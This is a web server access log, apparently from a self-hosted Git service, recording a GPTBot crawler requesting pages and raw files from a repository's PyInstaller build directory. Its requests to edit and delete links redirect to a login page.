"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 10583] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" +[17/Feb/2026:18:49:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:49:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:49:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:49:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:49:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:49:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:49:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:18:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 44573707] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:50:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:50:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:18:50:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" +[17/Feb/2026:18:50:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:18:50:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:50:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:18:50:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:50:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 863930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=source" [Client 74.7.227.38] [Length 526385] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 800279] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 908] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 806161] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=source" [Client 74.7.227.38] [Length 522623] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9826] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 858166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11147] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:18:50:39 +0000] - 200 200 - 